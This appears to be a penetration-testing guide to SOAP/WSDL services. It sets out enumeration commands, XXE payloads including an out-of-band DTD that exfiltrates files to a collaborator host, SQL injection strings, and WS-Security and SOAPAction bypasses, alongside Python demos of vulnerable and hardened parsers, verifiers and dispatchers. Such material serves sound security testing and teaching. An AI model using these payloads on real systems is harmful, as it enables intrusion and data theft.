SOAP & WSDL Attacks
SOAP/WSDL security testing: WSDL enumeration, XXE via SOAP body, SQLi in SOAP parameters, WS-Security bypass, parameter tampering, and Burp Suite workflow for XML-based web services.
What is SOAP
SOAP (Simple Object Access Protocol) is an XML-based messaging protocol for web services. The WSDL (Web Services Description Language) document describes all available operations, parameters, and data types — essentially a service blueprint that also serves as an attacker’s map.
Detection & Enumeration
Step 1 — Find SOAP endpoints
# Common WSDL URL patterns (the query is case-insensitive on most stacks; ASP.NET
# exposes .asmx?wsdl, WCF exposes .svc?wsdl and .svc?singleWsdl)
curl http://TARGET/service?wsdl
curl http://TARGET/api/soap?wsdl
curl http://TARGET/services/UserService?wsdl
curl http://TARGET/ws/v1?wsdl
curl http://TARGET/UserService.asmx?wsdl
curl http://TARGET/UserService.svc?wsdl
# Wordlist-based discovery; match on the WSDL root element so that generic 200
# responses (soft 404s, HTML error pages) are not mistaken for hits
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/wsdl.txt -mr '<(wsdl:)?definitions'
Step 2 — Parse the WSDL
The WSDL lists every operation, the message each one takes, the schema types of its parameters, the SOAPAction bound to each operation, and the endpoint address. That is everything needed to build a valid request before sending anything.
# Pretty-print the WSDL
curl -s http://TARGET/service?wsdl | xmllint --format - | less
# Extract all operation names (the wsdl: prefix is optional; many WSDLs use the default namespace)
curl -s http://TARGET/service?wsdl | grep -oE '<(wsdl:)?operation name="[^"]*"' | sort -u
# Extract the SOAPAction URI bound to each operation
curl -s http://TARGET/service?wsdl | grep -oE 'soapAction="[^"]*"'
# Extract named messages, parts and schema elements (the parameter names); noisy but quick
curl -s http://TARGET/service?wsdl | grep -oE '<[A-Za-z]*:?(message|part|element) name="[^"]*"' | sort -u
# The actual endpoint (soap:address), which may differ from the WSDL URL and even the host
curl -s http://TARGET/service?wsdl | grep -oE 'location="[^"]*"'
Step 3 — Generate test requests in Burp
Use the Wsdler BApp (see the Burp Suite workflow below) or construct a SOAP 1.1 envelope by hand. The operation is the first child of Body, its parameters are the children of that element, and the SOAPAction header carries the URI the WSDL binds to the operation. Note the blank line separating headers from the envelope:
POST /service HTTP/1.1
Host: TARGET
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://TARGET/service/GetUser"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ser="http://TARGET/service">
<soapenv:Header/>
<soapenv:Body>
<ser:GetUser>
<ser:username>admin</ser:username>
</ser:GetUser>
</soapenv:Body>
</soapenv:Envelope>
SOAP 1.2 services differ in three details: the envelope namespace is http://www.w3.org/2003/05/soap-envelope, the Content-Type is application/soap+xml, and there is no SOAPAction header (the action travels as an action= parameter of the Content-Type). Sending the wrong version usually returns a VersionMismatch fault, which is itself a quick fingerprint of the stack.
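The three steps above done in one script, as an added example that is not part of the original page: it parses a WSDL with Python's standard library, lists each operation with its SOAPAction and typed parameters, and builds the envelope and the raw HTTP request for Burp Repeater. SAMPLE_WSDL is a constructed document/literal WSDL for the fictional UserService at http://TARGET/service used on this page (GetUser and AdminReset are placeholders); real WSDLs that use rpc style or pull in schemas through wsdl:import or xsd:import need more handling than shown here.

```python
# Added example, not code from the page: parse a WSDL 1.1 document and build
# SOAP 1.1 requests for its operations with only the standard library.
# SAMPLE_WSDL is constructed for the fictional UserService at http://TARGET/service.
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

WSDL = "{http://schemas.xmlsoap.org/wsdl/}"
SOAP = "{http://schemas.xmlsoap.org/wsdl/soap/}"
XSD = "{http://www.w3.org/2001/XMLSchema}"
ENV_NS = "http://schemas.xmlsoap.org/soap/envelope/"

SAMPLE_WSDL = """<?xml version="1.0"?>
<definitions targetNamespace="http://TARGET/service" xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:tns="http://TARGET/service">
  <types><xsd:schema targetNamespace="http://TARGET/service">
    <xsd:element name="GetUser"><xsd:complexType><xsd:sequence>
      <xsd:element name="username" type="xsd:string"/>
    </xsd:sequence></xsd:complexType></xsd:element>
    <xsd:element name="AdminReset"><xsd:complexType><xsd:sequence>
      <xsd:element name="id" type="xsd:int"/><xsd:element name="reason" type="xsd:string"/>
    </xsd:sequence></xsd:complexType></xsd:element>
  </xsd:schema></types>
  <message name="GetUserRequest"><part name="parameters" element="tns:GetUser"/></message>
  <message name="AdminResetRequest"><part name="parameters" element="tns:AdminReset"/></message>
  <portType name="UserPort">
    <operation name="GetUser"><input message="tns:GetUserRequest"/></operation>
    <operation name="AdminReset"><input message="tns:AdminResetRequest"/></operation>
  </portType>
  <binding name="UserBinding" type="tns:UserPort">
    <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="GetUser"><soap:operation soapAction="http://TARGET/service/GetUser"/></operation>
    <operation name="AdminReset"><soap:operation soapAction="http://TARGET/service/AdminReset"/></operation>
  </binding>
  <service name="UserService"><port name="UserPort" binding="tns:UserBinding">
    <soap:address location="http://TARGET/service"/></port></service>
</definitions>"""


def parse_wsdl(text):
    """Return (endpoint, target namespace, {operation: (soapAction, [(param, xsd type), ...])})."""
    root = ET.fromstring(text)
    tns = root.get("targetNamespace")
    endpoint = root.find(f".//{SOAP}address").get("location")
    # document/literal wrapped style: the schema element named after the operation
    # wraps its parameters, so index every schema element by name
    wrappers = {e.get("name"): e for e in root.iter(f"{XSD}element")}
    ops = {}
    for op in root.findall(f"{WSDL}binding/{WSDL}operation"):
        name = op.get("name")
        soap_op = op.find(f"{SOAP}operation")
        action = soap_op.get("soapAction", "") if soap_op is not None else ""
        wrapper = wrappers.get(name)
        params = [] if wrapper is None else [
            (e.get("name"), e.get("type")) for e in wrapper.iter(f"{XSD}element") if e is not wrapper]
        ops[name] = (action, params)
    return endpoint, tns, ops


def xml_value(value, raw=False):
    """Escape a parameter value, or (raw=True) wrap it in CDATA so an injection payload
    containing ' < > or & reaches the application byte-for-byte. A CDATA section cannot
    contain its own terminator ]]>, so that sequence is split across two sections."""
    if not raw:
        return escape(value)
    return "<![CDATA[" + value.replace("]]>", "]]]]><![CDATA[>") + "]]>"


def build_envelope(tns, operation, params, raw=False):
    """SOAP 1.1 envelope invoking `operation` in namespace `tns` with a dict of parameters."""
    body = "".join(f"<ser:{k}>{xml_value(v, raw)}</ser:{k}>" for k, v in params.items())
    return (f'<soapenv:Envelope xmlns:soapenv="{ENV_NS}" xmlns:ser="{tns}">'
            f"<soapenv:Header/><soapenv:Body><ser:{operation}>{body}</ser:{operation}>"
            f"</soapenv:Body></soapenv:Envelope>")


def build_request(endpoint, action, envelope):
    """Raw HTTP/1.1 request text, ready to paste into Burp Repeater."""
    host, _, path = endpoint.split("//", 1)[1].partition("/")
    body = '<?xml version="1.0" encoding="utf-8"?>' + envelope
    return (f"POST /{path} HTTP/1.1\r\nHost: {host}\r\nContent-Type: text/xml; charset=utf-8\r\n"
            f'SOAPAction: "{action}"\r\nContent-Length: {len(body.encode())}\r\n\r\n{body}')


def extract_text(envelope, tns, name):
    """What the service sees for parameter `name` once its XML parser has run."""
    return ET.fromstring(envelope).find(f".//{{{tns}}}{name}").text


if __name__ == "__main__":
    endpoint, tns, ops = parse_wsdl(SAMPLE_WSDL)
    for name, (action, params) in ops.items():
        sample = {p: f"FUZZ_{p}" for p, _ in params}  # one skeleton request per operation
        print(build_request(endpoint, action, build_envelope(tns, name, sample)), "\n")
```

The raw=True path is what the injection sections below rely on: a payload containing <, > or & would otherwise be rejected by the server's XML parser before it ever reached the application code.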
Exploit 1: XXE via SOAP Body
SOAP is XML, so a service whose parser resolves external entities can be made to read local files and issue server-side requests from the envelope itself. Put the DOCTYPE before the Envelope root element (a DOCTYPE anywhere else is a well-formedness error) and reference the entity from a parameter the service echoes back in its response:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ser="http://TARGET/service">
<soapenv:Header/>
<soapenv:Body>
<ser:GetUser>
<ser:username>&xxe;</ser:username>
</ser:GetUser>
</soapenv:Body>
</soapenv:Envelope>
Before spending time on payloads, confirm the parser honours DTDs at all: a harmless internal entity such as <!ENTITY probe "x"> that comes back expanded means entities are processed, while a fault mentioning DOCTYPE, DTD or entities means the parser is hardened and this section is moot.
OOB XXE via external DTD (for blind XXE, when the value is never echoed). The parameter entity is fetched while the DTD is processed, so a request in the collaborator log proves external entity resolution even if the response shows nothing, and the hosted DTD can then exfiltrate file contents in a second request:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://COLLABORATOR/evil.dtd"> %xxe;]>
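Whether the payloads above work depends entirely on the server's parser. The following added example (mine, not from the page or from any framework) handles the same GetUser request with Python's xml.sax twice: once with external general entities enabled, which is the vulnerable configuration, and once with a lexical handler that rejects any DOCTYPE, which is the fix. The secret file is a constructed temp file standing in for /etc/passwd; the UserService namespace and COLLABORATOR host are the page's placeholders, and oob_dtd() writes out the standard two-stage external DTD that the blind payload fetches.

```python
# Added example, not code from the page: the same XXE request against a vulnerable
# and a hardened xml.sax configuration. The secret file is constructed test data.
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, property_lexical_handler

ENV = "http://schemas.xmlsoap.org/soap/envelope/"


class UsernameExtractor(ContentHandler):
    """What a naive service does: pull the text of <username> out of the body."""

    def __init__(self):
        super().__init__()
        self.usernames, self._buf = [], None

    def startElement(self, name, attrs):
        if name.rsplit(":", 1)[-1] == "username":
            self._buf = []

    def characters(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def endElement(self, name):
        if self._buf is not None and name.rsplit(":", 1)[-1] == "username":
            self.usernames.append("".join(self._buf))
            self._buf = None


class DoctypeForbidden(Exception):
    pass


class NoDoctype:
    """Lexical handler whose startDTD callback aborts the parse on any <!DOCTYPE>.
    SOAP messages never legitimately carry a DTD; refusing it up front closes external
    entities, parameter entities and entity expansion (billion laughs) in one place."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in a SOAP message")

    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def extract_username(envelope: bytes, resolve_external_entities: bool):
    parser = xml.sax.make_parser()
    handler = UsernameExtractor()
    parser.setContentHandler(handler)
    if resolve_external_entities:
        # VULNERABLE: SYSTEM entities are fetched, so file:// and http:// URIs are read
        parser.setFeature(feature_external_ges, True)
    else:
        # HARDENED: reject the DTD before a single entity can be declared
        parser.setProperty(property_lexical_handler, NoDoctype())
    parser.parse(io.BytesIO(envelope))
    return handler.usernames[0] if handler.usernames else None


def xxe_envelope(uri: str) -> bytes:
    """Same shape as the payload above: the DOCTYPE precedes the Envelope root element."""
    return (f'<?xml version="1.0"?>\n<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]>\n'
            f'<soapenv:Envelope xmlns:soapenv="{ENV}" xmlns:ser="http://TARGET/service">'
            f"<soapenv:Header/><soapenv:Body><ser:GetUser><ser:username>&xxe;</ser:username>"
            f"</ser:GetUser></soapenv:Body></soapenv:Envelope>").encode()


def oob_dtd(collaborator: str, path: str = "/etc/passwd") -> str:
    """Contents of the evil.dtd referenced by the blind payload above: %file reads the
    target, %eval declares an entity whose SYSTEM URI carries the contents to the
    collaborator as a query string (&#x25; is % escaped inside an entity value).
    Newlines in the file break the URI; single-line targets work as-is."""
    return (f'<!ENTITY % file SYSTEM "file://{path}">\n'
            f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{collaborator}/?x=%file;'>\">\n"
            "%eval;\n%exfil;\n")


def demo():
    """Returns (what the vulnerable parser leaked, what the hardened parser did)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash")  # constructed stand-in for /etc/passwd
        path = f.name
    try:
        envelope = xxe_envelope("file://" + path)
        leaked = extract_username(envelope, resolve_external_entities=True)
        try:
            extract_username(envelope, resolve_external_entities=False)
            outcome = "parsed"
        except DoctypeForbidden:
            outcome = "rejected"
    finally:
        os.unlink(path)
    return leaked, outcome


if __name__ == "__main__":
    print(demo())
```

The hardened path rejects the DTD rather than merely leaving external entities disabled: the stdlib default already does the latter, but an attacker-supplied DTD still buys entity-expansion denial of service, and a SOAP endpoint has no reason to accept one.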
Exploit 2: SQL Injection in SOAP Parameters
Once the envelope is parsed, each parameter reaches the application as a plain string, so SQL payloads go into the element text exactly as they would into a URL parameter. Characters that are special in XML must be escaped (&lt; &gt; &amp;) or the whole value wrapped in a CDATA section, otherwise the parser rejects the envelope before the payload reaches the database:
<ser:username>' OR '1'='1'-- -</ser:username>
<ser:id>1 UNION SELECT NULL,NULL-- -</ser:id>
<ser:username><![CDATA[' OR 1=1 AND 'a'<'b'-- -]]></ser:username>
Time-based blind (an AND condition works without stacked queries; use pg_sleep(5) on PostgreSQL, and on MSSQL WAITFOR DELAY '0:0:5' needs a stacked query, e.g. admin'; WAITFOR DELAY '0:0:5'--):
<ser:username>admin' AND SLEEP(5)-- -</ser:username>
Exploit 3: WS-Security Header Bypass
WS-Security carries authentication inside the SOAP Header (a wsse:Security block), independently of HTTP-level auth, and enforcement is frequently a password callback the developers wrote themselves. Three things to try:
Remove the security header entirely. Services that only validate the token when one is present accept the request unauthenticated:
<soapenv:Envelope ...>
<!-- No Header element -->
<soapenv:Body>
<ser:AdminOperation>...</ser:AdminOperation>
</soapenv:Body>
</soapenv:Envelope>
Username token with a blank PasswordText password (and, separately, a token with no Password element at all); a callback that compares the stored password against an empty or missing value is a classic bug. The wsse prefix must be declared or the envelope will not parse:
<soapenv:Header>
<wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText"></wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</soapenv:Header>
Replay a captured token. With PasswordDigest the password never travels in clear, but the digest is bound only to the Nonce and Created values sent with it, so a service that neither caches nonces nor rejects old Created timestamps accepts the same header indefinitely.
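To test these bypasses you first need to produce a valid token and then vary it. This added example (not from the page and not any library's code) builds UsernameToken headers in both PasswordText and PasswordDigest form, and pairs them with the verifier a correctly implemented service would run: it rejects a missing header, a blank or cleartext password, a stale Created timestamp, a wrong digest, and a replayed nonce. The admin/s3cret credential, the 5-minute skew window and the injectable clock are constructed test data.

```python
# Added example, not code from the page: WS-Security UsernameToken builder and a
# verifier that fails each bypass in this section. Credentials are constructed.
import base64
import hashlib
import hmac
import os
from datetime import datetime, timedelta, timezone
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
PROFILE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0"
PASSWORD_TEXT, PASSWORD_DIGEST = PROFILE + "#PasswordText", PROFILE + "#PasswordDigest"
TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"


def password_digest(nonce: bytes, created: str, password: str) -> str:
    """UsernameToken Profile 1.0: Base64(SHA-1(nonce + created + password)), nonce as raw bytes."""
    return base64.b64encode(hashlib.sha1(nonce + created.encode() + password.encode()).digest()).decode()


def security_header(username, password, digest=True, created=None, nonce=None) -> str:
    """<wsse:Security> header carrying a UsernameToken. digest=False sends PasswordText
    (cleartext); password="" reproduces the blank-password attempt shown above."""
    created = created or datetime.now(timezone.utc).strftime(TIME_FMT)
    nonce = nonce or os.urandom(16)
    if digest:
        pw_type, pw_value = PASSWORD_DIGEST, password_digest(nonce, created, password)
    else:
        pw_type, pw_value = PASSWORD_TEXT, escape(password)
    return (f'<wsse:Security xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}"><wsse:UsernameToken>'
            f"<wsse:Username>{escape(username)}</wsse:Username>"
            f'<wsse:Password Type="{pw_type}">{pw_value}</wsse:Password>'
            f"<wsse:Nonce>{base64.b64encode(nonce).decode()}</wsse:Nonce>"
            f"<wsu:Created>{created}</wsu:Created></wsse:UsernameToken></wsse:Security>")


class TokenVerifier:
    """Server side, written to fail each bypass in this section: missing header, blank
    password, cleartext PasswordText, stale Created, wrong digest, replayed nonce."""

    def __init__(self, passwords: dict, max_skew_seconds=300, now=None):
        self.passwords = passwords
        self.max_skew = timedelta(seconds=max_skew_seconds)
        # `now` is an injectable clock (TIME_FMT string) so tests are deterministic
        self.now = datetime.strptime(now, TIME_FMT).replace(tzinfo=timezone.utc) if now else None
        self.seen_nonces = set()

    def verify(self, header_xml) -> bool:
        if not header_xml:
            return False  # a missing header means unauthenticated, never "anonymous OK"
        token = ET.fromstring(header_xml).find(f"{{{WSSE}}}UsernameToken")
        if token is None:
            return False
        user = token.findtext(f"{{{WSSE}}}Username")
        pw = token.find(f"{{{WSSE}}}Password")
        nonce_b64 = token.findtext(f"{{{WSSE}}}Nonce")
        created = token.findtext(f"{{{WSU}}}Created")
        if user not in self.passwords or pw is None or not pw.text or not nonce_b64 or not created:
            return False
        if pw.get("Type") != PASSWORD_DIGEST:
            return False  # refuse cleartext passwords outright
        created_at = datetime.strptime(created, TIME_FMT).replace(tzinfo=timezone.utc)
        now = self.now or datetime.now(timezone.utc)
        if abs(now - created_at) > self.max_skew or nonce_b64 in self.seen_nonces:
            return False  # stale or replayed token
        expected = password_digest(base64.b64decode(nonce_b64), created, self.passwords[user])
        if not hmac.compare_digest(expected, pw.text):
            return False
        self.seen_nonces.add(nonce_b64)
        return True


if __name__ == "__main__":
    v = TokenVerifier({"admin": "s3cret"})
    good = security_header("admin", "s3cret")
    print("valid token:", v.verify(good), "| replayed:", v.verify(good),
          "| blank PasswordText:", v.verify(security_header("admin", "", digest=False)))
```

When a target accepts the blank-password, no-header or replayed variants that this verifier rejects, the finding is in the service's password callback or its nonce and timestamp handling, not in WS-Security itself.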
Exploit 4: Parameter Tampering
The WSDL types every parameter, but the type check happens in the XML layer, not in the business logic. Each parameter maps straight to a function argument, so test the same boundaries you would on any API:
<!-- Original: transfer $10 -->
<ser:amount>10</ser:amount>
<ser:account>ATTACKER</ser:account>
<!-- Modified: negative, oversized, or wrong-type values (a float where the WSDL says xsd:int) -->
<ser:amount>-10</ser:amount>
<ser:amount>99999999</ser:amount>
<ser:amount>10.00000001</ser:amount>
<!-- Duplicate element: does the service read the first value or the last? -->
<ser:amount>10</ser:amount><ser:amount>-10</ser:amount>
Exploit 5: SOAP Action Spoofing
In SOAP 1.1 the operation is named twice: by the first child element of Body and by the SOAPAction HTTP header. Some stacks dispatch on the header while the access-control layer in front of them (a WAF, an XML gateway, or a hand-written filter) decides on the body, or the other way round. Set SOAPAction to a privileged operation while keeping the body unchanged:
SOAPAction: "http://TARGET/service/AdminReset"
If the response is a fault about the privileged operation (missing parameters, for example) rather than a normal reply to the body's operation, the header is what gets dispatched. Also try an empty SOAPAction and one naming a non-existent operation; the differences in how each is handled tell you which value the server trusts.
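Two toy dispatchers, added here as an example rather than taken from the page or from any real framework, make the mismatch concrete: both run an access-control filter on the operation named in Body, but the vulnerable one then dispatches on SOAPAction, while the hardened one requires SOAPAction to agree with Body and uses the Body operation for everything. HANDLERS, the alice/admin callers and the TARGET namespace are constructed.

```python
# Added example, not code from the page: a toy SOAP 1.1 dispatcher in its vulnerable
# and hardened forms. Handlers, callers and the TARGET namespace are constructed.
import xml.etree.ElementTree as ET

ENV = "http://schemas.xmlsoap.org/soap/envelope/"
ACTION_PREFIX = "http://TARGET/service/"
ADMIN_ONLY = {"AdminReset"}
HANDLERS = {
    "GetUser": lambda params, caller: f"{caller} looked up {params.get('username')}",
    "AdminReset": lambda params, caller: f"ALL PASSWORDS RESET by {caller}",
}


def parse_message(envelope: str):
    """(operation, {param: value}) taken from the first child of soapenv:Body."""
    body = ET.fromstring(envelope).find(f"{{{ENV}}}Body")
    if body is None or len(body) == 0:
        raise ValueError("empty Body")
    op = body[0]
    local = lambda tag: tag.split("}", 1)[-1]  # strip the {namespace} prefix
    return local(op.tag), {local(c.tag): c.text for c in op}


def action_from_header(headers: dict) -> str:
    return headers.get("SOAPAction", "").strip().strip('"')


def authorise(operation: str, caller: str) -> bool:
    """Access-control filter keyed on whatever operation name it is handed."""
    return operation not in ADMIN_ONLY or caller == "admin"


def vulnerable_service(headers, envelope, caller):
    body_op, params = parse_message(envelope)
    if not authorise(body_op, caller):          # the filter looks at the Body ...
        return "403 Forbidden"
    op = action_from_header(headers).rsplit("/", 1)[-1]
    handler = HANDLERS.get(op)                  # ... but dispatch trusts SOAPAction
    return handler(params, caller) if handler else "Fault: unknown action"


def hardened_service(headers, envelope, caller):
    body_op, params = parse_message(envelope)
    action = action_from_header(headers)
    # The Body element is the operation. SOAPAction, if sent at all, must agree
    # with it; authorisation and dispatch then both use that single value.
    if action and action != ACTION_PREFIX + body_op:
        return "Fault: SOAPAction does not match the operation in Body"
    if not authorise(body_op, caller):
        return "403 Forbidden"
    handler = HANDLERS.get(body_op)
    return handler(params, caller) if handler else "Fault: unknown operation"


def get_user_envelope(username: str) -> str:
    return (f'<soapenv:Envelope xmlns:soapenv="{ENV}" xmlns:ser="http://TARGET/service">'
            f"<soapenv:Header/><soapenv:Body><ser: GetUser><ser:username>{username}</ser:username>"
            f"</ser:GetUser></soapenv:Body></soapenv:Envelope>".replace("<ser: GetUser>", "<ser:GetUser>"))


def spoof_demo():
    """Low-privilege caller keeps the harmless GetUser body, sets SOAPAction to AdminReset."""
    spoofed = {"SOAPAction": f'"{ACTION_PREFIX}AdminReset"'}
    envelope = get_user_envelope("bob")
    return vulnerable_service(spoofed, envelope, "alice"), hardened_service(spoofed, envelope, "alice")


if __name__ == "__main__":
    print(spoof_demo())
```

The same bug appears in mirror image when a gateway authorises on SOAPAction and the backend dispatches on Body; the fix is identical, because it removes the second source of truth rather than picking a winner.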
Burp Suite workflow
- Proxy — intercept SOAP requests; look for XML bodies with Content-Type: text/xml (SOAP 1.1) or application/soap+xml (SOAP 1.2).
- Wsdler (BApp) — paste the WSDL URL; Wsdler parses it and generates test requests for all operations in Repeater.
- Repeater — inject XXE, SQLi, and tampered values into each parameter.
- Intruder — fuzz SOAP parameters with injection wordlists; disable payload URL-encoding, which is meaningless inside XML, and XML-escape or CDATA-wrap payloads that contain < or &.
- Scanner — active scan tests XML injection and SQLi in SOAP bodies.